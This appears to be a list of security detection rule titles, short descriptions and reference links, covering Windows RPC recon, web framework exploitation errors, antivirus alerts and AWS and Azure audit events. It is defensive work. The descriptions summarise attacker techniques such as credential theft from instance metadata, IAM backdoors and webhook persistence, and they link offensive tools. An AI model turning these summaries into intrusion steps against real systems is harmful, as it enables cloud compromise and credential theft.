Remote Schedule Task Lateral Movement via SASec Detects remote RPC calls to create or execute a scheduled task via SASec https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931, https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md, https://github.com/zeronetworks/rpcfirewall, https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/
Recon Activity via SASec Detects remote RPC calls to read information about scheduled tasks via SASec https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931, https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md, https://github.com/zeronetworks/rpcfirewall, https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/
SharpHound Recon Account Discovery Detects remote RPC calls used by SharpHound to map remote connections and local group membership. https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-wkst/55118c55-2122-4ef9-8664-0c1ff9e168f3, https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-WKST.md, https://github.com/zeronetworks/rpcfirewall, https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/
SharpHound Recon Sessions Detects remote RPC calls used by SharpHound to map remote connections and local group membership. https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/02b1f559-fda2-4ba3-94c2-806eb2777183, https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-SRVS.md, https://github.com/zeronetworks/rpcfirewall, https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/
Ruby on Rails Framework Exceptions Detects suspicious Ruby on Rails exceptions that could indicate exploitation attempts http://edgeguides.rubyonrails.org/security.html, http://guides.rubyonrails.org/action_controller_overview.html, https://stackoverflow.com/questions/25892194/does-rails-come-with-a-not-authorized-exception, https://github.com/rails/rails/blob/cd08e6bcc4cd8948fe01e0be1ea0c7ca60373a25/actionpack/lib/action_dispatch/middleware/exception_wrapper.rb
Spring Framework Exceptions Detects suspicious Spring framework exceptions that could indicate exploitation attempts https://docs.spring.io/spring-security/site/docs/current/api/overview-tree.html
Potential SpEL Injection In Spring Framework Detects potential SpEL Injection exploitation, which may lead to RCE. https://owasp.org/www-community/vulnerabilities/Expression_Language_Injection, https://www.wix.engineering/post/threat-and-vulnerability-hunting-with-application-server-error-logs
Suspicious SQL Error Messages Detects SQL error messages that indicate probing for an injection attack http://www.sqlinjection.net/errors
Potential Server Side Template Injection In Velocity Detects exceptions in the Velocity template renderer; this most likely happens due to dynamic rendering of user input and may lead to RCE. https://antgarsil.github.io/posts/velocity/, https://www.wix.engineering/post/threat-and-vulnerability-hunting-with-application-server-error-logs
Antivirus Exploitation Framework Detection Detects a highly relevant Antivirus alert that reports an exploitation framework. This event must not be ignored just because the AV has blocked the malware; investigate how it got there in the first place. https://www.nextron-systems.com/?s=antivirus, https://www.virustotal.com/gui/file/925b0b28472d4d79b4bf92050e38cc2b8f722691c713fc28743ac38551bc3797, https://www.virustotal.com/gui/file/8f8daabe1c8ceb5710949283818e16c4aa8059bf2ce345e2f2c90b8692978424, https://www.virustotal.com/gui/file/d9669f7e3eb3a9cdf6a750eeb2ba303b5ae148a43e36546896f1d1801e912466
Antivirus Hacktool Detection Detects a highly relevant Antivirus alert that reports a hack tool or other attack tool. This event must not be ignored just because the AV has blocked the malware; investigate how it got there in the first place. https://www.nextron-systems.com/2021/08/16/antivirus-event-analysis-cheat-sheet-v1-8-2/, https://www.nextron-systems.com/?s=antivirus
Antivirus Password Dumper Detection Detects a highly relevant Antivirus alert that reports a password dumper. This event must not be ignored just because the AV has blocked the malware; investigate how it got there in the first place. https://www.nextron-systems.com/?s=antivirus, https://www.virustotal.com/gui/file/5fcda49ee7f202559a6cbbb34edb65c33c9a1e0bde9fa2af06a6f11b55ded619, https://www.virustotal.com/gui/file/a4edfbd42595d5bddb442c82a02cf0aaa10893c1bf79ea08b9ce576f82749448
Antivirus Ransomware Detection Detects a highly relevant Antivirus alert that reports ransomware. This event must not be ignored just because the AV has blocked the malware; investigate how it got there in the first place. https://www.nextron-systems.com/?s=antivirus, https://www.virustotal.com/gui/file/43b0f7872900bd234975a0877744554f4f355dc57505517abd1ef611e1ce6916, https://www.virustotal.com/gui/file/c312c05ddbd227cbb08958876df2b69d0f7c1b09e5689eb9d93c5b357f63eff7, https://www.virustotal.com/gui/file/20179093c59bca3acc6ce9a4281e8462f577ffd29fd7bf51cf2a70d106062045, https://www.virustotal.com/gui/file/554db97ea82f17eba516e6a6fdb9dc04b1d25580a1eb8cb755eeb260ad0bd61d, https://www.virustotal.com/gui/file/69fe77dd558e281621418980040e2af89a2547d377d0f2875502005ce22bc95c, https://www.virustotal.com/gui/file/6f0f20da34396166df352bf301b3c59ef42b0bc67f52af3d541b0161c47ede05
Antivirus Web Shell Detection Detects a highly relevant Antivirus alert that reports a web shell. It's highly recommended to tune this rule to the specific strings used by your antivirus solution by downloading a big WebShell repository from e.g. GitHub and checking the matches. This event must not be ignored just because the AV has blocked the malware; investigate how it got there in the first place. https://www.nextron-systems.com/?s=antivirus, https://github.com/tennc/webshell, https://www.virustotal.com/gui/file/bd1d52289203866645e556e2766a21d2275877fbafa056a76fe0cf884b7f8819/detection, https://www.virustotal.com/gui/file/308487ed28a3d9abc1fec7ebc812d4b5c07ab025037535421f64c60d3887a3e8/detection, https://www.virustotal.com/gui/file/7d3cb8a8ff28f82b07f382789247329ad2d7782a72dde9867941f13266310c80/detection, https://www.virustotal.com/gui/file/e841675a4b82250c75273ebf0861245f80c6a1c3d5803c2d995d9d3b18d5c4b5/detection, https://www.virustotal.com/gui/file/a80042c61a0372eaa0c2c1e831adf0d13ef09feaf71d1d20b216156269045801/detection, https://www.virustotal.com/gui/file/b219f7d3c26f8bad7e175934cd5eda4ddb5e3983503e94ff07d39c0666821b7e/detection, https://www.virustotal.com/gui/file/b8702acf32fd651af9f809ed42d15135f842788cd98d81a8e1b154ee2a2b76a2/detection, https://www.virustotal.com/gui/file/13ae8bfbc02254b389ab052aba5e1ba169b16a399d9bc4cb7414c4a73cd7dc78/detection
Antivirus Relevant File Paths Alerts Detects an Antivirus alert in a highly relevant file path or with a relevant file name. This event must not be ignored just because the AV has blocked the malware; investigate how it got there in the first place. https://www.nextron-systems.com/?s=antivirus
Suspicious SQL Query Detects suspicious SQL query keywords that are often used during recon, exfiltration or destructive activities, such as dropping tables and selecting wildcard fields https://github.com/sqlmapproject/sqlmap
AWS Attached Malicious Lambda Layer Detects when a user attached a Lambda layer to an existing function to override a library that is in use by the function, where their malicious code could utilize the function's IAM role for AWS API calls. This would give an adversary access to the privileges associated with the Lambda service role that is attached to that function. https://docs.aws.amazon.com/lambda/latest/dg/API_UpdateFunctionConfiguration.html
AWS CloudTrail Important Change Detects disabling, deleting and updating of a Trail https://docs.aws.amazon.com/awscloudtrail/latest/userguide/best-practices-security.html
Malicious Usage Of IMDS Credentials Outside Of AWS Infrastructure Detects when an instance identity has taken an action that isn't inside SSM. This can indicate that a compromised EC2 instance is being used as a pivot point. https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-identity-roles.html, https://ermetic.com/blog/aws/aws-ec2-imds-what-you-need-to-know/, https://www.packetmischief.ca/2023/07/31/amazon-ec2-credential-exfiltration-how-it-happens-and-how-to-mitigate-it/#lifting-credentials-from-imds-this-is-why-we-cant-have-nice-things
New Network ACL Entry Added Detects that network ACL entries have been added to a route table which could indicate that new attack vectors have been opened up in the AWS account. https://www.gorillastack.com/blog/real-time-events/important-aws-cloudtrail-security-events-tracking/
New Network Route Added Detects the addition of a new network route to a route table in AWS. https://www.gorillastack.com/blog/real-time-events/important-aws-cloudtrail-security-events-tracking/
Ingress/Egress Security Group Modification Detects when an account makes changes to the ingress or egress rules of a security group. This can indicate that an attacker is attempting to open up new attack vectors in the account, that they are trying to exfiltrate data over the network, or that they are trying to allow machines in that VPC/Subnet to contact a C&C server. https://www.gorillastack.com/blog/real-time-events/important-aws-cloudtrail-security-events-tracking/
LoadBalancer Security Group Modification Detects changes to the security groups associated with an Elastic Load Balancer (ELB) or Application Load Balancer (ALB). This can indicate a misconfiguration allowing more traffic into the system than required, or could indicate that an attacker is attempting to enable new connections into a VPC or subnet controlled by the account. https://www.gorillastack.com/blog/real-time-events/important-aws-cloudtrail-security-events-tracking/
RDS Database Security Group Modification Detects changes to the security group entries for RDS databases. This can indicate that a misconfiguration has occurred which potentially exposes the database to the public internet or to a wider audience within the VPC, or that valid rules have been removed, which could impact the availability of the database to legitimate services and users. https://www.gorillastack.com/blog/real-time-events/important-aws-cloudtrail-security-events-tracking/
Potential Malicious Usage of CloudTrail System Manager Detects when System Manager successfully executes commands against an instance. https://github.com/elastic/detection-rules/blob/main/rules/integrations/aws/initial_access_via_system_manager.toml
AWS Config Disabling Channel/Recorder Detects AWS Config Service disabling https://docs.aws.amazon.com/config/latest/developerguide/cloudtrail-log-files-for-aws-config.html
AWS Console GetSigninToken Potential Abuse Detects potentially suspicious events involving "GetSigninToken". An adversary using the "aws_consoler" tool can leverage this console API to create temporary federated credentials that help obfuscate which AWS credential is compromised (the original access key) and enable the adversary to pivot from the AWS CLI to console sessions without the need for MFA using the new access key issued in this request. https://github.com/NetSPI/aws_consoler, https://www.crowdstrike.com/blog/analysis-of-intrusion-campaign-targeting-telecom-and-bpo-companies/
SES Identity Has Been Deleted Detects an instance of an SES identity being deleted via the "DeleteIdentity" event. This may be an indicator of an adversary removing the account that carried out suspicious or malicious activities. https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/
AWS SAML Provider Deletion Activity Detects the deletion of an AWS SAML provider, potentially indicating malicious intent to disrupt administrative or security team access. An attacker can remove the SAML provider for the information security team or a team of system administrators, to make it difficult for them to work and investigate at the time of the attack and after it. https://docs.aws.amazon.com/IAM/latest/APIReference/API_DeleteSAMLProvider.html
AWS S3 Bucket Versioning Disable Detects when S3 bucket versioning is disabled. Threat actors use this technique during AWS ransomware incidents prior to deleting S3 objects. https://invictus-ir.medium.com/ransomware-in-the-cloud-7f14805bbe82
AWS Key Pair Import Activity Detects the import of SSH key pairs into AWS EC2, which may indicate an attacker attempting to gain unauthorized access to instances. This activity could lead to initial access, persistence, or privilege escalation, potentially compromising sensitive data and operations. https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_ImportKeyPair.html
AWS EC2 Disable EBS Encryption Identifies disabling of default Amazon Elastic Block Store (EBS) encryption in the current region. Disabling default encryption does not change the encryption status of your existing volumes. https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DisableEbsEncryptionByDefault.html
AWS EC2 Startup Shell Script Change Detects changes to the EC2 instance startup script. The shell script will be executed as root/SYSTEM every time the specific instances are booted up. https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/ec2__startup_shell_script/main.py#L9
AWS EC2 VM Export Failure An attempt to export an AWS EC2 instance has been detected. A VM Export might indicate an attempt to extract information from an instance. https://docs.aws.amazon.com/vm-import/latest/userguide/vmexport.html#export-instance
AWS ECS Task Definition That Queries The Credential Endpoint Detects when an Elastic Container Service (ECS) Task Definition includes a command to query the credential endpoint. This can indicate a potential adversary adding a backdoor to establish persistence or escalate privileges. https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/ecs__backdoor_task_def/main.py, https://docs.aws.amazon.com/AmazonECS/latest/APIReference/API_RegisterTaskDefinition.html, https://docs.aws.amazon.com/AmazonECS/latest/developerguide/task-iam-roles.html
AWS EFS Fileshare Modified or Deleted Detects when an EFS Fileshare is modified or deleted. You can't delete a file system that is in use. If the file system has any mount targets, the adversary must first delete them, so deletion of a mount will occur before deletion of a fileshare. https://docs.aws.amazon.com/efs/latest/ug/API_DeleteFileSystem.html
AWS EFS Fileshare Mount Modified or Deleted Detects when an EFS Fileshare Mount is modified or deleted. Deleting a mount target breaks any file system using it, which might disrupt instances or applications using those mounts. https://docs.aws.amazon.com/efs/latest/ug/API_DeleteMountTarget.html
AWS EKS Cluster Created or Deleted Identifies when an EKS cluster is created or deleted. https://any-api.com/amazonaws_com/eks/docs/API_Description
AWS ElastiCache Security Group Created Detects when an ElastiCache security group has been created. https://github.com/elastic/detection-rules/blob/598f3d7e0a63221c0703ad9a0ea7e22e7bc5961e/rules/integrations/aws/persistence_elasticache_security_group_creation.toml
AWS ElastiCache Security Group Modified or Deleted Identifies when an ElastiCache security group has been modified or deleted. https://github.com/elastic/detection-rules/blob/7d5efd68603f42be5e125b5a6a503b2ef3ac0f4e/rules/integrations/aws/impact_elasticache_security_group_modified_or_deleted.toml
Potential Bucket Enumeration on AWS Looks for potential enumeration of AWS buckets via ListBuckets. https://github.com/Lifka/hacking-resources/blob/c2ae355d381bd0c9f0b32c4ead049f44e5b1573f/cloud-hacking-cheat-sheets.md, https://jamesonhacking.blogspot.com/2020/12/pivoting-to-private-aws-s3-buckets.html, https://securitycafe.ro/2022/12/14/aws-enumeration-part-ii-practical-enumeration/
AWS GuardDuty Important Change Detects updates of the GuardDuty list of trusted IPs, perhaps to disable security alerts against malicious IPs. https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/guardduty__whitelist_ip/main.py#L9
AWS IAM Backdoor Users Keys Detects AWS API key creation for a user by another user. Backdoored users can be used to obtain persistence in the AWS environment. Also with this alert, you can detect a flow of AWS keys in your org. https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/iam__backdoor_users_keys/main.py
AWS IAM S3Browser Templated S3 Bucket Policy Creation Detects S3 browser utility creating Inline IAM policy containing default S3 bucket name placeholder value of "". https://permiso.io/blog/s/unmasking-guivil-new-cloud-threat-actor
AWS IAM S3Browser LoginProfile Creation Detects S3 Browser utility performing reconnaissance looking for existing IAM Users without a LoginProfile defined then (when found) creating a LoginProfile. https://permiso.io/blog/s/unmasking-guivil-new-cloud-threat-actor
AWS IAM S3Browser User or AccessKey Creation Detects S3 Browser utility creating IAM User or AccessKey. https://permiso.io/blog/s/unmasking-guivil-new-cloud-threat-actor
New AWS Lambda Function URL Configuration Created Detects when a user creates a Lambda function URL configuration, which could be used to expose the function to the internet and potentially allow unauthorized access to the function's IAM role for AWS API calls. This could give an adversary access to the privileges associated with the Lambda service role that is attached to that function. https://docs.aws.amazon.com/lambda/latest/dg/API_CreateFunctionUrlConfig.html, https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc, https://www.wiz.io/blog/how-to-set-secure-defaults-on-aws
AWS Glue Development Endpoint Activity Detects possibly suspicious Glue development endpoint activity. https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/, https://docs.aws.amazon.com/glue/latest/webapi/API_CreateDevEndpoint.html
AWS RDS Master Password Change Detects the change of database master password. It may be a part of data exfiltration. https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/rds__explore_snapshots/main.py
Modification or Deletion of an AWS RDS Cluster Detects modifications to an RDS cluster or its deletion, which may indicate potential data exfiltration attempts, unauthorized access, or exposure of sensitive information. https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_ModifyDBCluster.html, https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_DeleteDBCluster.html, https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc#rds-modifydbinstance
Restore Public AWS RDS Instance Detects the recovery of a new public database instance from a snapshot. It may be a part of data exfiltration. https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/rds__explore_snapshots/main.py
AWS Root Credentials Detects AWS root account usage. https://docs.aws.amazon.com/IAM/latest/UserGuide/id_root-user.html
AWS Route 53 Domain Transfer Lock Disabled Detects when a transfer lock was removed from a Route 53 domain. It is recommended to refrain from performing this action unless intending to transfer the domain to a different registrar. https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/integrations/aws/persistence_route_53_domain_transfer_lock_disabled.toml, https://docs.aws.amazon.com/Route53/latest/APIReference/API_Operations_Amazon_Route_53.html, https://docs.aws.amazon.com/Route53/latest/APIReference/API_domains_DisableDomainTransferLock.html
AWS Route 53 Domain Transferred to Another Account Detects when a request has been made to transfer a Route 53 domain to another AWS account. https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/integrations/aws/persistence_route_53_domain_transferred_to_another_account.toml
AWS S3 Data Management Tampering Detects when a user tampers with S3 data management in Amazon Web Services. https://github.com/elastic/detection-rules/pull/1145/files, https://docs.aws.amazon.com/AmazonS3/latest/API/API_Operations.html, https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketLogging.html, https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketWebsite.html, https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketEncryption.html, https://docs.aws.amazon.com/AmazonS3/latest/userguide/setting-repl-config-perm-overview.html, https://docs.aws.amazon.com/AmazonS3/latest/API/API_RestoreObject.html
AWS SecurityHub Findings Evasion Detects the modification of the findings on SecurityHub. https://docs.aws.amazon.com/cli/latest/reference/securityhub/
AWS Snapshot Backup Exfiltration Detects the modification of an EC2 snapshot's permissions to enable access from another account. https://www.justice.gov/file/1080281/download
AWS Identity Center Identity Provider Change Detects a change in the AWS Identity Center (FKA AWS SSO) identity provider. A change in identity provider allows an attacker to establish persistent access or escalate privileges via user impersonation. https://docs.aws.amazon.com/singlesignon/latest/userguide/app-enablement.html, https://docs.aws.amazon.com/singlesignon/latest/userguide/sso-info-in-cloudtrail.html, https://docs.aws.amazon.com/service-authorization/latest/reference/list_awsiamidentitycentersuccessortoawssinglesign-on.html
AWS STS AssumeRole Misuse Identifies the suspicious use of AssumeRole. Attackers could move laterally and escalate privileges. https://github.com/elastic/detection-rules/pull/1214, https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRole.html
AWS STS GetSessionToken Misuse Identifies the suspicious use of GetSessionToken. Tokens could be created and used by attackers to move laterally and escalate privileges. https://github.com/elastic/detection-rules/pull/1213, https://docs.aws.amazon.com/STS/latest/APIReference/API_GetSessionToken.html
AWS Suspicious SAML Activity Identifies when suspicious SAML activity has occurred in AWS. An adversary could gain backdoor access via SAML. https://docs.aws.amazon.com/IAM/latest/APIReference/API_UpdateSAMLProvider.html, https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRoleWithSAML.html
AWS User Login Profile Was Modified Detects activity when someone is changing passwords on behalf of other users. An attacker with the "iam:UpdateLoginProfile" permission on other users can change the password used to login to the AWS console on any user that already has a login profile setup. https://github.com/RhinoSecurityLabs/AWS-IAM-Privilege-Escalation
Azure Active Directory Hybrid Health AD FS New Server This detection uses azureactivity logs (Administrative category) to identify the creation or update of a server instance in an Azure AD Hybrid health AD FS service. A threat actor can create a new AD Health ADFS service and create a fake server instance to spoof AD FS signing logs. There is no need to compromise an on-prem AD FS server. This can be done programmatically via HTTP requests to Azure. https://o365blog.com/post/hybridhealthagent/
Azure Active Directory Hybrid Health AD FS Service Delete This detection uses azureactivity logs (Administrative category) to identify the deletion of an Azure AD Hybrid health AD FS service instance in a tenant. A threat actor can create a new AD Health ADFS service and create a fake server to spoof AD FS signing logs. The health AD FS service can then be deleted after it is no longer needed via HTTP requests to Azure. https://o365blog.com/post/hybridhealthagent/
User Added to an Administrator's Azure AD Role Detects when a user is added to an administrator's Azure AD role. https://m365internals.com/2021/07/13/what-ive-learned-from-doing-a-year-of-cloud-forensics-in-azure-ad/
Azure Application Deleted Identifies when an application is deleted in Azure. https://learn.microsoft.com/en-us/entra/identity/monitoring-health/reference-audit-activities#application-proxy
Azure Application Gateway Modified or Deleted Identifies when an application gateway is modified or deleted. https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations
Azure Application Security Group Modified or Deleted Identifies when an application security group is modified or deleted. https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations
Azure Application Credential Modified Identifies when an application credential is modified. https://www.cloud-architekt.net/auditing-of-msi-and-service-principals/
Azure Container Registry Created or Deleted Detects when a Container Registry is created or deleted. https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes, https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/, https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/, https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1, https://attack.mitre.org/matrices/enterprise/cloud/
Number Of Resource Creation Or Deployment Activities Detects a number of VM creation or deployment activities occurring in Azure via the azureactivity log. https://github.com/Azure/Azure-Sentinel/blob/e534407884b1ec5371efc9f76ead282176c9e8bb/Detections/AzureActivity/Creating_Anomalous_Number_Of_Resources_detection.yaml
Azure Device No Longer Managed or Compliant Identifies when a device in Azure is no longer managed or compliant. https://learn.microsoft.com/en-us/entra/identity/monitoring-health/reference-audit-activities#core-directory
Azure Device or Configuration Modified or Deleted Identifies when a device or device configuration in Azure is modified or deleted. https://learn.microsoft.com/en-us/entra/identity/monitoring-health/reference-audit-activities#core-directory
Azure DNS Zone Modified or Deleted Identifies when a DNS zone is modified or deleted. https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes
Azure Firewall Modified or Deleted Identifies when a firewall is created, modified, or deleted. https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations
Azure Firewall Rule Collection Modified or Deleted Identifies when Rule Collections (Application, NAT, and Network) are being modified or deleted. https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations
Granting Of Permissions To An Account Identifies IPs from which users grant access to other users on azure resources and alerts when a previously unseen source IP address is used. https://github.com/Azure/Azure-Sentinel/blob/e534407884b1ec5371efc9f76ead282176c9e8bb/Detections/AzureActivity/Granting_Permissions_To_Account_detection.yaml
Azure Keyvault Key Modified or Deleted Identifies when a Keyvault Key is modified or deleted in Azure. https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations
Azure Key Vault Modified or Deleted Identifies when a key vault is modified or deleted. https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations
Azure Keyvault Secrets Modified or Deleted Identifies when secrets are modified or deleted in Azure. https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations
Azure Kubernetes Admission Controller Identifies when an admission controller is executed in Azure Kubernetes. A Kubernetes Admission controller intercepts, and possibly modifies, requests to the Kubernetes API server. The behavior of this admission controller is determined by an admission webhook (MutatingAdmissionWebhook or ValidatingAdmissionWebhook) that the user deploys in the cluster. An adversary can use such webhooks as the MutatingAdmissionWebhook for obtaining persistence in the cluster. For example, attackers can intercept and modify the pod creation operations in the cluster and add their malicious container to every created pod. An adversary can use the webhook ValidatingAdmissionWebhook, which could be used to obtain access credentials. An adversary could use the webhook to intercept the requests to the API server, record secrets, and other sensitive information. https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes
Azure Kubernetes Cluster Created or Deleted Detects when an Azure Kubernetes Cluster is created or deleted. https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes, https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/, https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/, https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1, https://attack.mitre.org/matrices/enterprise/cloud/
Azure Kubernetes CronJob Identifies when an Azure Kubernetes CronJob runs in Azure Cloud. A Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate. A Kubernetes Job can be used to run containers that perform finite tasks for batch jobs. A Kubernetes CronJob is used to schedule Jobs. An adversary may use a Kubernetes CronJob to schedule execution of malicious code that would run as a container in the cluster. https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes, https://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/, https://kubernetes.io/docs/concepts/workloads/controllers/job/, https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
Azure Kubernetes Events Deleted Detects when Events are deleted in Azure Kubernetes. An adversary may delete events in Azure Kubernetes in an attempt to evade detection. https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes, https://github.com/elastic/detection-rules/blob/da3852b681cf1a33898b1535892eab1f3a76177a/rules/integrations/azure/defense_evasion_kubernetes_events_deleted.toml
Azure Kubernetes Network Policy Change Identifies when an Azure Kubernetes network policy is modified or deleted. https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes, https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/, https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/, https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1, https://attack.mitre.org/matrices/enterprise/cloud/
Azure Kubernetes Pods Deleted Identifies the deletion of Azure Kubernetes Pods. https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes, https://github.com/elastic/detection-rules/blob/065bf48a9987cd8bd826c098a30ce36e6868ee46/rules/integrations/azure/impact_kubernetes_pod_deleted.toml
Azure Kubernetes RoleBinding/ClusterRoleBinding Modified and Deleted Detects the creation or patching of a potentially malicious RoleBinding/ClusterRoleBinding. https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes, https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/, https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/, https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1, https://attack.mitre.org/matrices/enterprise/cloud/
Azure Kubernetes Sensitive Role Access Identifies when ClusterRoles/Roles are being modified or deleted. https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes, https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/, https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/, https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1, https://attack.mitre.org/matrices/enterprise/cloud/
Azure Kubernetes Secret or Config Object Access Identifies when a Kubernetes account accesses sensitive objects such as configmaps or secrets. https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes, https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/, https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/, https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1, https://attack.mitre.org/matrices/enterprise/cloud/
Azure Kubernetes Service Account Modified or Deleted Identifies when a service account is modified or deleted. https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes, https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/, https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/, https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1, https://attack.mitre.org/matrices/enterprise/cloud/
Disabled MFA to Bypass Authentication Mechanisms Detects when multi-factor authentication has been disabled, which might indicate malicious activity to bypass authentication mechanisms. https://learn.microsoft.com/en-us/azure/active-directory/authentication/howto-mfa-userstates
Azure Network Firewall Policy Modified or Deleted Identifies when a Firewall Policy is modified or deleted. https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations
Azure Point-to-site VPN Modified or Deleted Identifies when a Point-to-site VPN is modified or deleted. https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations
Azure Firewall Rule Configuration Modified or Deleted Identifies when a Firewall Rule Configuration is modified or deleted. https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations
Azure Network Security Configuration Modified or Deleted Identifies when a network security configuration is modified or deleted. https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations
Azure Virtual Network Device Modified or Deleted Identifies when a virtual network device is being modified or deleted. This can be a network interface, network virtual appliance, virtual hub, or virtual router. https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations
Azure New CloudShell Created Identifies when a new Cloud Shell is created inside the Azure portal. https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations
Azure Owner Removed From Application or Service Principal Identifies when an owner was removed from an application or service principal in Azure. https://learn.microsoft.com/en-us/entra/identity/monitoring-health/reference-audit-activities#application-proxy
Rare Subscription-level Operations In Azure Identifies IPs from which users grant access to other users on azure resources and alerts when a previously unseen source IP address is used. https://github.com/Azure/Azure-Sentinel/blob/e534407884b1ec5371efc9f76ead282176c9e8bb/Detections/AzureActivity/RareOperations.yaml
Azure Service Principal Created Identifies when a service principal is created in Azure. https://learn.microsoft.com/en-us/entra/identity/monitoring-health/reference-audit-activities#application-proxy
Azure Service Principal Removed Identifies when a service principal was removed in Azure. https://learn.microsoft.com/en-us/entra/identity/monitoring-health/reference-audit-activities#application-proxy
